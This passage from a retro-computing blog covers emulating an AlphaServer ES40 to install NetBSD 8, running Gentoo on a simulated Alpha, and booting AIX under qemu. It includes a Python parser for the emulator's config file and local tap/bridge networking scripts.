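        return value == "true"
    return int(value) if value.isdigit() else value  # sizes like "800M" stay strings


def _parse_block(tokens, pos, nested):
    """Parse statements from tokens[pos]; return (dict, position after the block)."""
    block = {}
    while pos < len(tokens):
        kind, value = tokens[pos]
        if kind == "}":
            if not nested:
                raise ValueError("unexpected '}' at token %d" % pos)
            return block, pos + 1
        if kind == "{":  # anonymous block, like the keyboard block at the top
            inner, pos = _parse_block(tokens, pos + 1, True)
            block.setdefault("_anonymous", []).append(inner)
            continue
        if kind != "word" or pos + 2 >= len(tokens) or tokens[pos + 1][0] != "=":
            raise ValueError("expected 'name = value' at token %d" % pos)
        name, (vkind, vvalue) = value, tokens[pos + 2]
        pos += 3
        if vkind == "word" and pos < len(tokens) and tokens[pos][0] == "{":
            inner, pos = _parse_block(tokens, pos + 1, True)
            inner["_type"] = vvalue  # e.g. tsunami, file, dec21143
            block[name] = inner
        elif vkind in ("word", "str"):
            if pos >= len(tokens) or tokens[pos][0] != ";":
                raise ValueError("missing ';' after %s = %r" % (name, vvalue))
            block[name] = _scalar(vkind, vvalue)
            pos += 1
        else:
            raise ValueError("bad value for %r at token %d" % (name, pos - 1))
    if nested:
        raise ValueError("missing '}' at end of input")
    return block, pos


def parse_config(text):
    """Parse a whole es40.cfg document into nested dicts."""
    return _parse_block(tokenize(text), 0, False)[0]


def cdrom_images(config):
    """File names of every disk declared with cdrom = true, anywhere in the tree."""
    found = []
    def walk(node):
        for child in node.values():
            for item in (child if isinstance(child, list) else [child]):
                if isinstance(item, dict):
                    if item.get("cdrom") is True:
                        found.append(item.get("file"))
                    walk(item)
    walk(config)
    return found
```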

Next we will boot the simulator (we will need root privileges since we touch the tap0 interface)

$ cd ~/RUN 
$ su 
# ./es40

The following should be visible after the disk gets created

Next we telnet to localhost port 21264

$ telnet localhost 21264

After a while (memory testing procedure …) you will get the following SRM prompt

We run sho dev to list all the devices visible to the Alpha console, and since we are installing we will boot DKA400 (the ISO CDROM with NetBSD 8)

P00>>> boot DKA400

And the boot process gets stuck on mcclock() and moves no further … so what now? Well, let's first stop the emulator. I could not stop it normally, so I just issued a kill command …

root@panasonic:/home/user# ps -ef | grep es40
root 32409 32366 74 22:29 pts/3 00:05:11 ./es40
root@panasonic:/home/user# kill -9 32409
root@panasonic:/home/user#

Luckily Dimitry Kalinkin modified the above sources so that NetBSD could boot, and his fork of ES40 can be downloaded from here https://github.com/veprbl/es40

So lets build this one and see how it goes

Lets move the old ES40 sources away 
$ mv ~/es40 ~/es40.old 
$ git clone  https://github.com/veprbl/es40
$ cd es40 
$ cp config/config.guess  .
$ ./configure
This is the debug-options configuration script for the ES40 emulator
If you don't want any debugging options enabled, answer YES to the
following question
Do you want the defaults for all options? (yes, no) [yes]: yes
$ make 
...... 
$ 

So once we have the new es40 binary built we copy it over the old one and re-run the emulator

$ cd ~/RUN 
$ cp ~/es40/src/es40 .     <-- the new es40 binary 
$ su 
# ./es40

This time we should be in much better shape (memory checks are gone, and the whole Console startup is much faster … )

And what's important, the NetBSD 8 installation ISO loads and actually installs, so after we run

P00>>> boot DKA400

the NetBSD/alpha 8.0 installer finally comes up

Installation is then pretty standard and I will not cover it here; however, there are a few issues after the installation finishes (install the full sets, and do not set up the network in the installer yet). We power off the NetBSD installer and in the SRM console we choose the dka0 disk to boot from

P00>>> set boot_osflags a             (thx herdware) 
P00>>> boot DKA0

Now we will need to wait a while for the initial scripts to finish; this takes some time, so be patient

<-- cut -->
Loaded entropy from /var/db/entropy-file.
Setting tty flags.
Setting sysctl variables:
ddb.onpanic: 1 -> 0
Starting network.
/etc/rc: WARNING: $hostname not set.
IPv6 mode: host
Configuring network interfaces:.
Adding interface aliases:.
Waiting for DAD to complete for statically configured addresses...
Building databases: dev, services.
Starting syslogd.
Mounting all file systems...
Clearing temporary files.
Updating fontconfig cache:

What I cannot get to run is the networking. The emulated NetBSD can see the network device:

# ifconfig -a
tlp0: flags=0x8802<BROADCAST,SIMPLEX,MULTICAST> mtu 1500
ec_capabilities=1<VLAN_MTU>
ec_enabled=0
address: 08:00:2b:e5:40:00
media: Ethernet autoselect (autoselect)
lo0: flags=0x8048<LOOPBACK,RUNNING,MULTICAST> mtu 33112

But when I bring it up like this

# ifconfig tlp0 10.0.2.222 255.255.255.0 up 
# ifconfig -a
tlp0: flags=0x8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
ec_capabilities=1<VLAN_MTU>
ec_enabled=0
address: 08:00:2b:e5:40:00
media: Ethernet autoselect (100baseTX)
status: active
inet 10.0.2.222/8 broadcast 10.255.255.255 flags 0x0
inet6 fe80::a00:2bff:fee5:4000%tlp0/64 flags 0x0 scopeid 0x1
lo0: flags=0x8048<LOOPBACK,RUNNING,MULTICAST> mtu 33112

# route add default 10.0.2.2
# route show
Routing tables

Internet:
Destination Gateway Flags Refs Use Mtu Interface

default 10.0.2.2 UG - - - tlp0
10.0.2/24 link#1 U - - - tlp0
10.0.2.222 link#1 UHl - - - lo0

Internet6:
Destination Gateway Flags Refs Use Mtu Interface
fe80::%tlp0/64 link#1 U - - - tlp0
fe80::a00:2bff:fee link#1 UHl - - - lo0
ff01:1::/32 link#1 U - - - tlp0
ff02::%tlp0/32 link#1 U - - - tlp0

I get the following console messages flooding in
tlp0: filter setup and transmit timeout
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: filter setup and transmit timeout
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: filter setup and transmit timeout
tlp0: receive process failed to idle: state RUNNING - WAIT
tlp0: receive process failed to idle: state RUNNING - WAIT

The network does not work with my bridged tap0 device ..

Full dmesg below

Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
    2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017,
    2018 The NetBSD Foundation, Inc.  All rights reserved.
Copyright (c) 1982, 1986, 1989, 1991, 1993
    The Regents of the University of California.  All rights reserved.

NetBSD 8.0 (GENERIC) #0: Tue Jul 17 14:59:51 UTC 2018
        mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/alpha/compile/GENERIC
AlphaServer ES40, 800MHz, s/n 
8192 byte page size, 1 processor.
total memory = 512 MB
(2736 KB reserved for PROM, 509 MB used by NetBSD)
avail memory = 489 MB
timecounter: Timecounters tick every 0.976 msec
Kernelized RAIDframe activated
running cgd selftest aes-xts-256 aes-xts-512 done
mainbus0 (root)
cpu0 at mainbus0: ID 0 (primary), 21264C-6
cpu0: Architecture extensions: 0x1305<PAT,MVI,CIX,BWX>
tsc0 at mainbus0: 21272 Core Logic Chipset, Cchip rev 0
tsc0: 8 Dchips, 2 memory buses of 16 bytes
tsc0: arrays present: 512MB, 0MB, 0MB, 0MB, Dchip 0 rev 1
tsp0 at tsc0
pci0 at tsp0 bus 0
pci0: i/o space, memory space enabled, rd/line, rd/mult, wr/inv ok
siop0 at pci0 dev 3 function 0: Symbios Logic 53c810 (fast scsi)
siop0: interrupting at dec 6600 irq 16
scsibus0 at siop0: 8 targets, 8 luns per target
tlp0 at pci0 dev 4 function 0: DECchip 21143 Ethernet, pass 3.0
tlp0: interrupting at dec 6600 irq 20
tlp0: DEC, Ethernet address 08:00:2b:e5:40:00
tlp0: 100baseTX, 10baseT, auto
sio0 at pci0 dev 7 function 0: vendor 10b9 product 1533 (rev. 0xc3)
isa0 at sio0
lpt0 at isa0 port 0x3bc-0x3bf irq 7
com0 at isa0 port 0x3f8-0x3ff irq 4: ns8250 or ns16450, no fifo
com0: console
pckbc0 at isa0 port 0x60-0x64
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0 mux 1
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
attimer0 at isa0 port 0x40-0x43
pcppi0 at isa0 port 0x61
spkr0 at pcppi0: PC Speaker
midi0 at pcppi0: PC speaker
isabeep0 at pcppi0
mcclock0 at isa0 port 0x70-0x71: mc146818 compatible time-of-day clock
attimer0: attached to pcppi0
tsp1 at tsc0
pci1 at tsp1 bus 0
pci1: i/o space, memory space enabled, rd/line, rd/mult, wr/inv ok
tsciic0 at tsc0
iic0 at tsciic0: I2C bus
timecounter: Timecounter "clockinterrupt" frequency 1024 Hz quality 0
timecounter: Timecounter "PCC" frequency 792674656 Hz quality 1000
scsibus0: waiting 2 seconds for devices to settle...
sd0 at scsibus0 target 0 lun 0: <DEC, RZ58     (C) DEC, 2000> disk fixed
sd0: 6000 MB, 15360 cyl, 16 head, 50 sec, 512 bytes/sect x 12288000 sectors
sd0: async, 8-bit transfers
cd0 at scsibus0 target 4 lun 0: <DEC, RRD42   (C) DEC, 4.5d> cdrom removable
cd0: async, 8-bit transfers
sd1 at scsibus0 target 5 lun 0: <DEC, RZ58     (C) DEC, 2000> disk fixed
sd1: 10240 KB, 32 cyl, 16 head, 40 sec, 512 bytes/sect x 20480 sectors
sd1: async, 8-bit transfers
root on sd0a dumps on sd0b
kern.module.path=/stand/alpha/8.0/modules
/dev/sd0a: file system not clean (fs_clean=0x40); please fsck(8)
/dev/sd0a: lost blocks 0 files 0

Video here :

Acknowledgements :

https://raymii.org/s/blog/Installing_the_es40_AlphaServer_emulator_0.18_on_Ubuntu_16.04_and_trying_to_install_openVMS_8.4_on_es40.html

https://github.com/veprbl/es40

http://es40.org/Homepage

Hacker from the Shire

A while ago I saw a nice parody short comic strip from Middle-earth, in which Gandalf visits Bilbo Baggins a few years after his adventures at the Lonely Mountain. Bilbo has of course brought back with him the "one" ring of power, which tends to corrupt even the strongest characters among mortal men or hobbits.

How surprised was Gandalf to find out that Bilbo had started a new "burglary" business operation in his Bag End along with the fellow surviving dwarves (Nori, Dori and Bombur)

The above comic was made by Alexandr Remizov and the original Russian version is here

https://www.mirf.ru/fun/funny/komiks-vzlomschik-iz-shira

Gentoo on Alpha – Flying Circus 2

Today is All Souls' Day and people usually spend some time remembering the dead. I will take the opportunity and remember the dead computer architecture Alpha (made by Digital, which was the top computer hardware in the 90s and early 2000s)

A year has passed and I wanted to update the existing Gentoo installation that I made in the past, which ran on Alphavm-free. This time it took me 4 weeks to chew through the kernel configuration and a couple of unsuccessful kernel builds, and during all this time my Panasonic Toughbook CF-53 ran almost nonstop at 100% CPU (amazing hardware btw)

I will not cover how to set up Gentoo on the simulated Alpha EV67 Tsunami, as it was partially described in last year's blog entry. I wanted to keep this post short and to the point. This time it's again a little show-off, "Circus" style, of what was done on the simulation.

Here are the details of the simulated system (I'm running all this on Linux Mint 19 x86_64). The Alphavm-free guest has 1 CPU and 1 GB RAM assigned

# cat /proc/cpuinfo 
cpu			: Alpha
cpu model		: EV67
cpu variation		: 7
cpu revision		: 0
cpu serial number	: AlphaVM-CPU-00
system type		: Tsunami
system variation	: Catamaran
system revision		: 0
system serial number	: EmuVM-00-000-001"
cycle frequency [Hz]	: 833333333 
timer frequency [Hz]	: 1000.00
page size [bytes]	: 8192
phys. address bits	: 44
max. addr. space #	: 255
BogoMIPS		: 814.28
kernel unaligned acc	: 0 (pc=0,va=0)
user unaligned acc	: 143076 (pc=20000180500,va=1200741a9)
platform string		: AlphaServer DS20E 833 MHz
cpus detected		: 1
cpus active		: 1
cpu active mask		: 0000000000000001
L1 Icache		: 64K, 2-way, 64b line
L1 Dcache		: 64K, 2-way, 64b line
L2 cache		: n/a
L3 cache		: n/a

The following packages are installed on the Gentoo Alpha as of today (2nd November)

app-admin/eselect-1.4.13
app-admin/perl-cleaner-2.25
app-arch/bzip2-1.0.6-r10
app-arch/cpio-2.12-r1
app-arch/gzip-1.8
app-arch/libarchive-3.3.1
app-arch/tar-1.30
app-arch/unzip-6.0_p21-r2
app-arch/xz-utils-5.2.3
app-crypt/rhash-1.3.6-r1
app-editors/nano-2.8.7
app-editors/vim-8.0.1298
app-editors/vim-core-8.0.1298
app-eselect/eselect-ctags-1.18
app-eselect/eselect-fontconfig-1.0
app-eselect/eselect-lib-bin-symlink-0.1.1
app-eselect/eselect-opengl-1.3.1-r4
app-eselect/eselect-pinentry-0.7
app-eselect/eselect-postgresql-2.3
app-eselect/eselect-python-20171204
app-eselect/eselect-ruby-20170723
app-eselect/eselect-vi-1.1.9
app-misc/ca-certificates-20170717.3.36.1
app-misc/c_rehash-1.7-r1
app-misc/editor-wrapper-4
app-misc/mime-types-9
app-misc/pax-utils-1.2.3
app-portage/elt-patches-20170815
app-portage/portage-utils-0.64
app-shells/bash-4.4_p12
app-text/build-docbook-catalog-1.21
app-text/docbook-xml-dtd-4.1.2-r6
app-text/docbook-xsl-stylesheets-1.79.1-r2
app-text/manpager-1
app-text/openjade-1.3.2-r7
app-text/opensp-1.5.2-r3
app-text/po4a-0.47-r1
app-text/sgml-common-0.6.3-r6
app-vim/gentoo-syntax-20180821
dev-db/postgresql-10.5
dev-db/sqlite-3.24.0
dev-lang/perl-5.24.3-r1
dev-lang/python-2.7.14-r1
dev-lang/python-3.5.4-r1
dev-lang/python-3.6.5
dev-lang/python-exec-2.4.6
dev-lang/ruby-2.3.7
dev-libs/elfutils-0.170-r1
dev-libs/expat-2.2.5
dev-libs/glib-2.52.3
dev-libs/gmp-6.1.2
dev-libs/iniparser-3.1-r1
dev-libs/libassuan-2.5.1
dev-libs/libbsd-0.9.1
dev-libs/libevdev-1.5.9-r1
dev-libs/libffi-3.2.1
dev-libs/libgcrypt-1.8.3
dev-libs/libgpg-error-1.29
dev-libs/libinput-1.10.7
dev-libs/libksba-1.3.5-r1
dev-libs/libltdl-2.4.6
dev-libs/libpcre-8.41-r1
dev-libs/libpipeline-1.4.2
dev-libs/libpthread-stubs-0.4-r1
dev-libs/libtasn1-4.13
dev-libs/libunistring-0.9.7
dev-libs/libxml2-2.9.7
dev-libs/libxslt-1.1.30-r2
dev-libs/libyaml-0.1.7
dev-libs/mpc-1.0.3
dev-libs/mpfr-3.1.6
dev-libs/nettle-3.4
dev-libs/npth-1.3
dev-libs/openssl-1.0.2p
dev-libs/popt-1.16-r2
dev-perl/Authen-SASL-2.160.0-r1
dev-perl/Digest-HMAC-1.30.0-r1
dev-perl/Error-0.170.250
dev-perl/IO-Socket-SSL-2.52.0
dev-perl/libintl-perl-1.280.0
dev-perl/Locale-gettext-1.70.0
dev-perl/MailTools-2.190.0
dev-perl/Module-Build-0.422.400
dev-perl/Net-SMTP-SSL-1.40.0
dev-perl/Net-SSLeay-1.820.0
dev-perl/SGMLSpm-1.1-r1
dev-perl/TermReadKey-2.370.0
dev-perl/Text-CharWidth-0.40.0-r1
dev-perl/Text-Unidecode-1.300.0
dev-perl/Text-WrapI18N-0.60.0-r1
dev-perl/TimeDate-2.300.0
dev-perl/Unicode-EastAsianWidth-1.330.0-r1
dev-perl/XML-Parser-2.440.0
dev-python/certifi-2018.4.16
dev-python/docutils-0.13.1
dev-python/pyblake2-1.1.0
dev-python/pygments-2.2.0
dev-python/pyxattr-0.5.5
dev-python/setuptools-36.7.2
dev-ruby/did_you_mean-1.0.2
dev-ruby/json-1.8.6-r1
dev-ruby/minitest-5.10.3
dev-ruby/net-telnet-0.1.1-r1
dev-ruby/power_assert-1.1.1
dev-ruby/racc-1.4.14
dev-ruby/rake-10.5.0
dev-ruby/rdoc-4.3.0
dev-ruby/rubygems-2.7.6-r1
dev-ruby/test-unit-3.2.7
dev-util/cmake-3.9.6
dev-util/ctags-20161028
dev-util/desktop-file-utils-0.23
dev-util/gperf-3.1
dev-util/gtk-doc-am-1.25-r1
dev-util/intltool-0.51.0-r2
dev-util/meson-0.46.1
dev-util/ninja-1.8.2
dev-util/pkgconfig-0.29.2
dev-util/ragel-6.10
dev-util/re2c-1.0.3
games-engines/scummvm-2.0.0
media-fonts/encodings-1.0.4-r1
media-fonts/font-alias-1.0.3-r1
media-fonts/font-misc-misc-1.1.2-r1
media-fonts/font-util-1.3.1
media-fonts/liberation-fonts-2.00.1-r3
media-libs/fontconfig-2.13.0-r4
media-libs/freetype-2.9.1-r3
media-libs/glew-2.1.0
media-libs/glu-9.0.0-r1
media-libs/imlib2-1.5.1
media-libs/libepoxy-1.5.1
media-libs/libjpeg-turbo-1.5.3-r2
media-libs/libpng-1.6.34
media-libs/libsdl2-2.0.8-r2
media-libs/mesa-18.1.9
net-dns/libidn2-2.0.4
net-firewall/iptables-1.4.21-r1
net-libs/gnutls-3.5.19
net-libs/libmnl-1.0.4
net-libs/libnsl-0
net-libs/libpcap-1.8.1
net-mail/mailbase-1.1
net-misc/curl-7.61.1
net-misc/iputils-20171016_pre
net-misc/netifrc-0.5.1
net-misc/openssh-7.5_p1-r4
net-misc/rsync-3.1.3
net-misc/tigervnc-1.8.0-r3
net-misc/wget-1.19.1-r2
perl-core/File-Path-2.130.0
perl-core/File-Temp-0.230.400-r1
sys-apps/acl-2.2.52-r1
sys-apps/attr-2.4.47-r2
sys-apps/baselayout-2.4.1-r2
sys-apps/busybox-1.29.0
sys-apps/coreutils-8.29-r1
sys-apps/debianutils-4.8.3
sys-apps/diffutils-3.6-r1
sys-apps/file-5.33-r4
sys-apps/findutils-4.6.0-r1
sys-apps/gawk-4.1.4
sys-apps/gentoo-functions-0.12
sys-apps/grep-3.0
sys-apps/groff-1.22.2
sys-apps/help2man-1.47.6
sys-apps/hwids-20171003
sys-apps/install-xattr-0.5
sys-apps/iproute2-4.17.0
sys-apps/kbd-2.0.4
sys-apps/kmod-24
sys-apps/less-531
sys-apps/man-db-2.7.6.1-r2
sys-apps/man-pages-4.16
sys-apps/man-pages-posix-2013a
sys-apps/net-tools-1.60_p20161110235919
sys-apps/openrc-0.34.11
sys-apps/opentmpfiles-0.1.3
sys-apps/pciutils-3.5.6
sys-apps/portage-2.3.49
sys-apps/sandbox-2.13
sys-apps/sed-4.5
sys-apps/shadow-4.6
sys-apps/sysvinit-2.88-r9
sys-apps/texinfo-6.3
sys-apps/util-linux-2.32-r4
sys-apps/which-2.21
sys-auth/pambase-20150213-r1
sys-boot/aboot-1.0_pre20040408-r3
sys-devel/autoconf-2.69-r4
sys-devel/autoconf-wrapper-13-r1
sys-devel/automake-1.15.1-r2
sys-devel/automake-wrapper-10
sys-devel/bc-1.06.95-r2
sys-devel/binutils-2.29.1-r1
sys-devel/binutils-2.30-r4
sys-devel/binutils-config-5-r4
sys-devel/bison-3.0.5-r1
sys-devel/flex-2.6.4-r1
sys-devel/gcc-6.4.0-r1
sys-devel/gcc-config-1.8-r1
sys-devel/gettext-0.19.8.1
sys-devel/gnuconfig-20170101
sys-devel/libtool-2.4.6-r3
sys-devel/m4-1.4.17
sys-devel/make-4.2.1-r4
sys-devel/patch-2.7.6-r2
sys-fs/e2fsprogs-1.43.6
sys-fs/eudev-3.2.5
sys-fs/udev-init-scripts-32
sys-kernel/genkernel-3.5.3.3
sys-kernel/gentoo-sources-4.14.65
sys-kernel/linux-firmware-20181001
sys-kernel/linux-headers-4.13
sys-libs/cracklib-2.9.6-r1
sys-libs/db-5.3.28-r2
sys-libs/e2fsprogs-libs-1.43.6
sys-libs/gdbm-1.13-r2
sys-libs/glibc-2.26-r7
sys-libs/libutempter-1.1.6-r2
sys-libs/mtdev-1.1.5
sys-libs/ncurses-6.1-r2
sys-libs/pam-1.3.0-r2
sys-libs/readline-7.0_p3
sys-libs/timezone-data-2018e
sys-libs/zlib-1.2.11-r2
sys-process/procps-3.3.12-r1
sys-process/psmisc-23.1-r1
virtual/acl-0-r1
virtual/dev-manager-0-r1
virtual/editor-0
virtual/glu-9.0-r2
virtual/jpeg-0-r2
virtual/libc-1
virtual/libelf-3
virtual/libffi-3.0.13-r1
virtual/libiconv-0-r2
virtual/libintl-0-r2
virtual/libudev-232
virtual/man-0-r1
virtual/modutils-0
virtual/opengl-7.0-r2
virtual/os-headers-0
virtual/package-manager-1
virtual/pager-0
virtual/pam-0-r1
virtual/perl-CPAN-Meta-2.150.5-r1
virtual/perl-CPAN-Meta-YAML-0.18.0-r3
virtual/perl-Data-Dumper-2.160.0-r1
virtual/perl-Digest-MD5-2.540.0-r3
virtual/perl-Digest-SHA-5.950.100_rc-r6
virtual/perl-ExtUtils-CBuilder-0.280.225-r2
virtual/perl-ExtUtils-Install-2.40.0-r3
virtual/perl-ExtUtils-MakeMaker-7.100.200_rc-r4
virtual/perl-ExtUtils-Manifest-1.700.0-r5
virtual/perl-ExtUtils-ParseXS-3.310.0-r1
virtual/perl-File-Path-2.130.0
virtual/perl-File-Spec-3.630.100_rc-r4
virtual/perl-File-Temp-0.230.400-r5
virtual/perl-Getopt-Long-2.480.0-r1
virtual/perl-IO-1.360.100_rc-r4
virtual/perl-JSON-PP-2.273.0.100_rc-r6
virtual/perl-libnet-3.80.100_rc-r4
virtual/perl-MIME-Base64-3.150.0-r4
virtual/perl-Module-Metadata-1.0.31-r1
virtual/perl-Parse-CPAN-Meta-1.441.700.100_rc-r4
virtual/perl-Perl-OSType-1.9.0-r1
virtual/perl-podlators-4.70.0-r1
virtual/perl-Scalar-List-Utils-1.420.200_rc-r1
virtual/perl-Test-Harness-3.360.100_rc-r3
virtual/perl-Text-ParseWords-3.300.0-r4
virtual/perl-version-0.991.600-r1
virtual/pkgconfig-0-r1
virtual/rubygems-11
virtual/service-manager-0
virtual/shadow-0
virtual/ssh-0
virtual/tmpfiles-0
virtual/ttf-fonts-1-r1
virtual/udev-217
virtual/yacc-0
www-client/dillo-3.0.5
x11-apps/bdftopcf-1.1
x11-apps/iceauth-1.0.8
x11-apps/luit-1.1.1
x11-apps/mesa-progs-8.3.0
x11-apps/mkfontdir-1.0.7
x11-apps/mkfontscale-1.1.3
x11-apps/rgb-1.0.6
x11-apps/xauth-1.0.10
x11-apps/xinit-1.4.0
x11-apps/xkbcomp-1.4.2
x11-apps/xmessage-1.0.5
x11-apps/xrdb-1.1.1
x11-apps/xsetroot-1.1.2
x11-base/xcb-proto-1.13
x11-base/xorg-drivers-1.19
x11-base/xorg-proto-2018.4
x11-base/xorg-server-1.19.5-r2
x11-drivers/xf86-input-keyboard-1.9.0
x11-drivers/xf86-input-libinput-0.27.1
x11-drivers/xf86-input-mouse-1.9.3
x11-drivers/xf86-video-ati-18.0.1-r1
x11-drivers/xf86-video-dummy-0.3.8
x11-drivers/xf86-video-fbdev-0.5.0
x11-drivers/xf86-video-glint-1.2.9
x11-drivers/xf86-video-mga-1.6.5
x11-drivers/xf86-video-nv-2.1.21
x11-drivers/xf86-video-r128-6.10.2
x11-libs/fltk-1.3.3-r3
x11-libs/libdrm-2.4.93
x11-libs/libfontenc-1.1.3-r1
x11-libs/libICE-1.0.9-r2
x11-libs/libpciaccess-0.14
x11-libs/libSM-1.2.2-r2
x11-libs/libX11-1.6.6
x11-libs/libXau-1.0.8-r1
x11-libs/libXaw-1.0.13-r1
x11-libs/libxcb-1.13.1
x11-libs/libXcursor-1.1.15
x11-libs/libXdamage-1.1.4-r2
x11-libs/libXdmcp-1.1.2-r2
x11-libs/libXext-1.3.3-r1
x11-libs/libXfixes-5.0.3-r1
x11-libs/libXfont2-2.0.3-r1
x11-libs/libXft-2.3.2-r1
x11-libs/libXi-1.7.9-r1
x11-libs/libXinerama-1.1.4
x11-libs/libxkbfile-1.0.9-r2
x11-libs/libXmu-1.1.2-r1
x11-libs/libXpm-3.5.12-r1
x11-libs/libXrandr-1.5.1-r1
x11-libs/libXrender-0.9.10-r1
x11-libs/libxshmfence-1.3-r1
x11-libs/libXt-1.1.5-r1
x11-libs/libXtst-1.2.3-r1
x11-libs/libXxf86vm-1.1.4-r1
x11-libs/pixman-0.34.0
x11-libs/xtrans-1.3.5
x11-misc/shared-mime-info-1.9
x11-misc/util-macros-1.19.2
x11-misc/xbitmaps-1.1.2
x11-misc/xkeyboard-config-2.23.1-r1
x11-terms/xterm-327
x11-wm/fluxbox-1.3.7-r3

Unfortunately I had no luck getting a recent Linux kernel and initramfs on Gentoo to load the qla1280 (SCSI) disk driver:

# udevadm info -a -n /dev/sda | grep -oP 'DRIVERS?=="\K[^"]+'
sd
qla1280

No matter whether I built it into the kernel or as a separate module, the initramfs would not find the root device since there was no usable /dev/sda, so I ended up using last year's kernel, modules and initramfs together with the base Alpha Gentoo install CD from April 2018. As I said earlier, it took some time to build it all, and here it is now. Everything works: networking, an X11 desktop over VNC, even some wild acrobatic performances which we will cover here in a little detail.

Act 1 – Running VAX OpenVMS 7.3 via simh on the simulated Alpha

This is as useless as it sounds, but it was great fun actually seeing that it worked :) Hey .. so dig this: we simulate an Alpha Gentoo system via Alphavm-free on x86_64 Linux, inside the simulation we run the simh VAX simulator, in which we load an already installed OpenVMS 7.3 disk image and configuration, and we watch it run via a VNC session … it took about 30 minutes to boot (OpenVMS 7.3 inside Gentoo Alpha via the simh VAX simulation), but it runs, and that's what is important. Did you understand this at all? :) Simulation via simulator via stimulus ..

Act 2 – Running the current Metasploit Framework on Gentoo Alpha

Yes, it's pretty much useless, but nevertheless cool once you know that it works.

Loading the Metasploit Framework there takes about 6 minutes, but once it is up it's pretty much fun. The only thing I had to do the non-Gentoo way was to build Git from source directly, since via emerge it had some crazy dependency that just did not compile (something pine-mail related .. I cannot remember exactly now).

Act 3 – Running Dillo in a VNC session and browsing the internet on Alpha Gentoo

Well, since the Alphavm-free simulation is missing X11 altogether, we might as well cheat a little and emerge the tigervnc server environment on the Gentoo system to actually load some graphical stuff on the simulated Alpha :) How else to prove a point than by surfing the net with the world's fastest/most-secure/best browser? Enter Dillo.

And this concludes today's Flying Circus Alpha Acrobatics show for 2018. Hopefully I won't repeat this next year in 2019, but who knows .. it's always fun messing around with systems like this.

Running AIX 7.2 TL3SP1 on x86_64 via qemu-system-ppc64

Who would not wish to run the best operating system on earth on their pitiful Intel laptop? I will describe here what I have done with the help of others and share some of my findings and recommendations on how to get this going.

For this exercise I'm using Linux Mint 19 x86_64 and the current qemu compiled from source, which you can get from here: https://github.com/qemu/qemu

One should get output similar to this from the compilation:

$ git clone git://git.qemu.org/qemu.git
$ cd qemu
$ mkdir build
$ cd build
$ ../configure
$ make
$ su 
# make install 
# exit 
$  qemu-system-ppc64 --version
QEMU emulator version 3.0.50 (v3.0.0-614-g19b599f766-dirty)
Copyright (c) 2003-2017 Fabrice Bellard and the QEMU Project developers

So once we have qemu installed, we can move on to getting an actual AIX ISO, which I obviously cannot share, but I will link some existing documentation on how to get it done if you already have a Power environment with AIX on it:

https://www.ibm.com/developerworks/community/blogs/cgaix/resource/AIX_QEMU_blog.pdf?lang=en_us

Next I will share my tun/tap scripts as well as the installer loader and normal loader scripts for AIX.

Here is my standard Linux networking script that I use for various VMs and simulators (VirtualBox, Alphavm-free, simh, hercules):

#!/bin/sh
# Setup tap and bridge (run as root)
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
# vboxnet0 is already on the bridge, only the tap device is added here
brctl addif br0 tap0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Please change this according to your needs: enp0s25 is eth0, and wlp9s0 is the internet-connected wlan0.
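As an added example (not the blog's own script), here is the same tap0/br0 setup done with iproute2 instead of tunctl/brctl/ifconfig: it is idempotent (safe to re-run), has a matching teardown, restricts forwarding and NAT to the guest subnet, and has a DRY_RUN=1 mode that only prints the plan so it can be reviewed without root. The interface names and addresses (enp0s25, wlp9s0, tap0, br0, 10.0.2.2/24) are taken from the post and are assumptions you override via the environment.

```shell
#!/bin/sh
# Added example, not the script from the post: tap/bridge setup with iproute2.
# Assumed names (from the post, override via the environment): enp0s25 is the
# wired NIC enslaved to the bridge, wlp9s0 the internet uplink that NATs the
# guests, 10.0.2.2/24 the host address the guests use as their gateway.
# Usage (as root): sh bridge.sh up | down      DRY_RUN=1 sh bridge.sh up

BR=${BR:-br0}
TAP=${TAP:-tap0}
TAP_USER=${TAP_USER:-user}
LAN_IF=${LAN_IF:-enp0s25}
WAN_IF=${WAN_IF:-wlp9s0}
BR_ADDR=${BR_ADDR:-10.0.2.2/24}
GUEST_NET=${GUEST_NET:-10.0.2.0/24}
DRY_RUN=${DRY_RUN:-0}

# Execute a command, or print it instead when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# True when an interface of that name exists; always false in dry-run mode
# so that the printed plan lists every step.
link_exists() {
    [ "$DRY_RUN" != 1 ] && ip link show "$1" >/dev/null 2>&1
}

# Append an iptables rule only if an identical one is not present yet
# (-C checks for it), so repeated runs do not stack duplicate rules.
ipt_add() {
    table=$1; shift
    if [ "$DRY_RUN" = 1 ] || ! iptables -t "$table" -C "$@" 2>/dev/null; then
        run iptables -t "$table" -A "$@"
    fi
}

# Delete an iptables rule only if it is present.
ipt_del() {
    table=$1; shift
    if [ "$DRY_RUN" = 1 ] || iptables -t "$table" -C "$@" 2>/dev/null; then
        run iptables -t "$table" -D "$@"
    fi
}

bridge_up() {
    link_exists "$BR" || run ip link add name "$BR" type bridge
    run ip link set "$BR" type bridge forward_delay 0   # like brctl setfd br0 0
    link_exists "$TAP" || run ip tuntap add dev "$TAP" mode tap user "$TAP_USER"
    run ip link set "$TAP" master "$BR"
    run ip link set "$LAN_IF" master "$BR"
    # the bridge, not an enslaved port, carries the host-side address
    run ip addr replace "$BR_ADDR" dev "$BR"
    run ip link set "$TAP" up
    run ip link set "$LAN_IF" up
    run ip link set "$BR" up
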